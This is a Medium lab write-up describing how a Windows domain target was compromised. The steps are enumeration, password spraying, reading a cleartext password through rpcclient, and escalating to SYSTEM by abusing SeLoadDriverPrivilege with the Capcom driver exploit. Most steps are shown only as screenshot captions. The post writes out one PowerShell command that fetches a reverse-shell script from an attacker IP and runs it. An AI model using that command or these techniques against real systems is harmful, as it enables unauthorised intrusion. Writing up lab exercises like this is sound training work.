Image for post
Image for post

Target Experience:

My observations while working this target:

Tools:

The recommended tools for this lab were:

Vulnerabilities:

· Exposed Username(s)

Information Gathering:

Using Nmap, I saved the output while scanning for service version detection, OS detection, script scanning, and verbose mode of the target system.

Image for post
Image for post
Figure 1: Nmap Scan
Image for post
Image for post
Figure 2: CrackMapExec SMB Enumeration
Image for post
Image for post
Figure 3: CME LDAP Enumeration
Image for post
Image for post
Figure 4: Failed LDAP Enumeration
Image for post
Image for post
Figure 5: Default Web Page
Image for post
Image for post
Figure 6: Exposed Usernames

Foothold:

After gathering the usernames, I decided that I would try to password spray the target; even though I was not able to obtain the password lockout policy.

Image for post
Image for post
Figure 7: Original Password List
Image for post
Image for post
Figure 8: For Loop & Hashcat
Image for post
Image for post
Figure 9: Snip of Final Password List
Image for post
Image for post
Figure 10: Spraying Results
Image for post
Image for post
Figure 11: SMB & WinRM Results
Image for post
Image for post
Figure 12: smbpasswd & rpcclient
Image for post
Image for post
Figure 13: Failed Logon
Image for post
Image for post
Figure 14: script.sh & auth.in
Image for post
Image for post
Figure 15: Cleartext Password — RPCClient (enumprinters)
Image for post
Image for post
Figure 16: Password Spraying
Image for post
Image for post
Figure 17: Validated WinRM Access
Image for post
Image for post
Figure 18: User Shell (svc-print)

Privilege Escalation:

After establishing a foothold, I started to enumerate the target. Interestingly, I have not seen the SeLoadDriverPrivilege enabled for a service account. So, I performed an Internet based search for “SeLoadDriverPrivilege abuse” and found a few articles that provided details for a privilege escalation.

Image for post
Image for post
Figure 19: Privilege to Abuse
Image for post
Image for post
Figure 20: EoPLoadDriver.cpp
Image for post
Image for post
Figure 21: ExploitCapcom.cpp
powershell.exe iex (iwr http://10.10.15.111/Invoke-RS.ps1 -UseBasicParsing);
Image for post
Image for post
Figure 22: Successfully Abused Privilege
Image for post
Image for post
Figure 23: Executed Exploit
Image for post
Image for post
Figure 24: Priv Esc Shell (SYSTEM)

References:

https://www.youtube.com/watch?v=H9FcE_FMZio&t=730

Disclaimer:

This article is made available for educational purposes only!!! In addition, this article provides general information on cyber security topics used for “Ethical Hacking”.

Cyber Security Enthusiast

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store